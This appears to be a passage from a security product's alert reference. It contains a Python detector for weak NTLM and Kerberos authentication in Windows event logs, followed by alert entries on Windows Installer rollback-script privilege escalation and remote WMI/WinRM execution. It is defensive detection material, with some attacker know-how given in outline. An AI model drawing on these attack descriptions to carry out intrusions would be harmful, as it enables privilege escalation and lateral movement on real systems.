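A detector serving both this alert and "Unusual weak authentication by user" above, added here as an example and not Cortex XDR code. It parses the key/value text of Windows Security events, flags 4624 logons whose NTLM package is NTLM V1 or LM (alerting only the first time an account is seen doing so, after a training pass builds the baseline) and 4769 TGS requests whose ticket encryption type is RC4 or DES (alerting on every event). The field names follow the 4624 and 4769 event layouts; the event texts, account names, hosts and addresses are constructed for the example.

```python
import re

# 4624 "Package Name (NTLM only)" values that indicate a downgraded NTLM exchange.
WEAK_NTLM_PACKAGES = {"NTLM V1", "LM"}
# 4769 "Ticket Encryption Type" values that are deprecated and cheap to crack offline.
WEAK_ETYPES = {"0x1": "DES-CBC-CRC", "0x3": "DES-CBC-MD5", "0x17": "RC4-HMAC"}

FIELD_RE = re.compile(r"^\s*([A-Za-z][A-Za-z0-9 ()/-]*?):\s*(.*?)\s*$")


def parse_event(text):
    """Parse 'Key: Value' lines into a dict. Later duplicates overwrite earlier ones,
    so for 4624 'Account Name' holds the New Logon account, not the Subject."""
    fields = {}
    for line in text.splitlines():
        m = FIELD_RE.match(line)
        if m:
            fields[m.group(1).strip()] = m.group(2)
    return fields


def classify(fields):
    """Return a finding dict for a weak-protocol event, or None."""
    eid = fields.get("Event ID")
    if eid == "4624" and fields.get("Authentication Package", "").upper() == "NTLM":
        pkg = fields.get("Package Name (NTLM only)", "").upper()
        if pkg in WEAK_NTLM_PACKAGES:
            return {"kind": "ntlm-downgrade", "account": fields.get("Account Name"),
                    "source": fields.get("Workstation Name"), "detail": pkg}
    if eid == "4769":
        etype = fields.get("Ticket Encryption Type", "").lower()
        if etype in WEAK_ETYPES:
            return {"kind": "weak-kerberos-etype", "account": fields.get("Account Name"),
                    "source": fields.get("Client Address"), "detail": WEAK_ETYPES[etype]}
    return None


class WeakAuthDetector:
    """Baseline of (kind, account) pairs from the training period; NTLMv1/LM alerts
    only on first sight per account, weak Kerberos etypes alert every time."""

    def __init__(self):
        self.baseline = set()

    def train(self, events):
        for text in events:
            hit = classify(parse_event(text))
            if hit:
                self.baseline.add((hit["kind"], hit["account"]))

    def check(self, text):
        hit = classify(parse_event(text))
        if hit is None:
            return None
        key = (hit["kind"], hit["account"])
        hit["first_seen"] = key not in self.baseline
        self.baseline.add(key)
        hit["alert"] = hit["kind"] == "weak-kerberos-etype" or hit["first_seen"]
        return hit


def event_4624(account, workstation, package):
    """Constructed 4624 text; the 'Event ID' line is added for the example."""
    return f"""Event ID: 4624
An account was successfully logged on.
Subject:
    Account Name:   -
Logon Type:   3
New Logon:
    Account Name:   {account}
    Account Domain: CORP
Detailed Authentication Information:
    Logon Process:  NtLmSsp
    Authentication Package:    NTLM
    Package Name (NTLM only):  {package}
Network Information:
    Workstation Name:   {workstation}
"""


def event_4769(account, client, etype):
    """Constructed 4769 text with the fields this check reads."""
    return f"""Event ID: 4769
A Kerberos service ticket was requested.
Account Information:
    Account Name:   {account}@CORP.EXAMPLE
Service Information:
    Service Name:   MSSQLSvc/db01.corp.example:1433
Network Information:
    Client Address: ::ffff:{client}
Additional Information:
    Ticket Options: 0x40810000
    Ticket Encryption Type: {etype}
    Failure Code:   0x0
"""


def run_example():
    det = WeakAuthDetector()
    det.train([event_4624("svc_legacy", "LEGACY-APP01", "NTLM V1")])   # known weak account
    return [det.check(e) for e in (
        event_4624("svc_legacy", "LEGACY-APP01", "NTLM V1"),   # in baseline: no alert
        event_4624("jdoe", "WS-42", "NTLM V1"),                # first weak logon: alert
        event_4624("jdoe", "WS-42", "NTLM V2"),                # NTLMv2: not weak
        event_4769("jdoe", "10.0.0.25", "0x17"),               # RC4 TGS request: alert
        event_4769("jdoe", "10.0.0.25", "0x12"),               # AES256: fine
    )]


if __name__ == "__main__":
    for result in run_example():
        print(result)
```

The baseline is what keeps a legacy service account that has always used NTLMv1 from paging you daily, while the Kerberos check has no such exemption because a TGS request that explicitly asks for RC4 is worth a look each time.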

Windows Installer exploitation for local privilege escalation
Synopsis
Learning Period: 14 Days
Training Period: 30 Days
Test Period: N/A (single event)
Deduplication Period: 1 Day
Required Data: XDR Agent
Required Detection Modules: No module required
ATT&CK Tactic: Privilege Escalation (TA0004)
ATT&CK Technique: Exploitation for Privilege Escalation (T1068)
Severity: Medium

Description
The Windows installer (msiexec.exe) was likely exploited to run a malicious rollback script (.rbs file) instead
of the original. Users should not be able to modify config.msi during the installation process; only SYSTEM
should have access to it.

Attacker's Goals
An attacker is attempting to gain SYSTEM privileges.

Investigative Actions
• Investigate the actor process SID and path and whether it's benign or normal for this host.
• This action is not common, but allowed on Windows versions older than Windows 8. On those systems,
check the file reputation for both the CGO and OS actor executables that ran the installation.

WmiPrvSe.exe Rare Child Command Line
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 1 Day

Required Data XDR Agent

Required Detection Modules No module required

ATT&CK Tactic • Lateral Movement (TA0008)
• Execution (TA0002)

ATT&CK Technique • Remote Services (T1021)
• Remote Services: Windows Remote Management (T1021.006)
• Windows Management Instrumentation (T1047)

Severity Medium

Description
A remote WMI command was handled by a binary proxy, the Windows Management Instrumentation (WMI) Provider Host wmiprvse.exe, which then executed a rare child command line. A rare child process spawned this way can be an indication of remote code execution abuse by an attacker.

Attacker's Goals
Gain code execution on a remote host.

Investigative Actions
• Investigate the processes being spawned from WmiPrvse.exe on the host for malicious indicators.
• Correlate the RPC call from the source host and understand what initiated it.

Wsmprovhost.exe Rare Child Process
The Wsmprovhost.exe Rare Child Process alert indicates that a remote WMI command executed a binary proxy, which in turn executed a rare child process; this can indicate remote code execution abuse by an attacker.

Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 1 Day

Required Data XDR Agent

Required Detection Modules No module required

ATT&CK Tactic • Lateral Movement (TA0008)
• Execution (TA0002)

ATT&CK Technique • Remote Services: Windows Remote Management (T1021.006)
• Command and Scripting Interpreter: PowerShell (T1059.001)

Severity Low

Description
The PowerShell host wsmprovhost.exe is a proxy process that runs PowerShell commands issued remotely over Windows Remote Management (WinRM). It has executed a rare child process, which may indicate remote code execution abuse by an attacker.

Attacker's Goals
Gain code execution on a remote host.

Investigative Actions
• Investigate the processes being spawned from Wsmprovhost.exe on the host for malicious indicators.
• Correlate the initiator process (most likely PowerShell) to the source host and investigate it.
